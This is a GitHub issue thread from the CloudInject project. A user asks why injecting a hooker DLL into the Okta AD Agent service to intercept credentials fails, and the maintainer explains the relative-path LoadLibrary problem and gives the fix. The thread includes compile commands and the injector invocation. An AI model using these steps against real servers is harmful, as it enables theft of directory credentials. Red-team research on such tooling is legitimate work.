Fail to inject OKTA AD Connector

[superboy-zjc]

OS: Windows Server 2016 Okta AD Agent version: 3.17.0.0

I can manage to intercept the credential through x64dbg, while fail to do this by injecting the DLL

The way I compile the hooker and injector:

x86_64-w64-mingw32-g++.exe .\hooker\hooker.cpp -o
 .\Hooker\hooker.dll -static -shared
x86_64-w64-mingw32-g++.exe .\Injector\injector.cp
p -o .\Injector\injector.exe -static

Try to exploit, while nothing happen:

PS C:\Users\Administrator\Desktop\cloudinject\CloudInject-main> tasklist /FI  "IMAGENAME eq OKTA*"

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
OktaAgentService.exe          6120 Services                   0     55,828 K
PS C:\Users\Administrator\Desktop\cloudinject\CloudInject-main> .\Injector\injector.exe 6120 .\Hooker\hooker.dll

Could you advise me how to solve this?

[xpn]

The issue looks to be because you are passing in a relative path to the DLL to inject.

The injector writes in the path to the DLL (.\Hooker\hooker.dll\0 is 20 bytes), and then within the OktaAgentService.exe it calls LoadLibrary(). So in this case it's going to do LoadLibrary(".\Hooker.\hooker.dll") which will fail because OktaAgentService.exe doesn't know the full path.

I'll update the documentation, but for fixing this, move hooker.dll to a shared directory that OktaAgentService.exe can open, so C:\Tools\Hooker.dll for example, and then pass the full path to injector.exe, so injector.exe 6120 C:\Tools\Hoooker.dll.

You can also make sure that the DLL is loaded using ProcessExplorer or SystemInformer.

[xpn]

Updated the README.md with an example: https://github.com/xpn/CloudInject/blob/main/README.md

[superboy-zjc]

Oh! it works now! Thanks for your help!

[xpn]

Thanks for confirming 🙏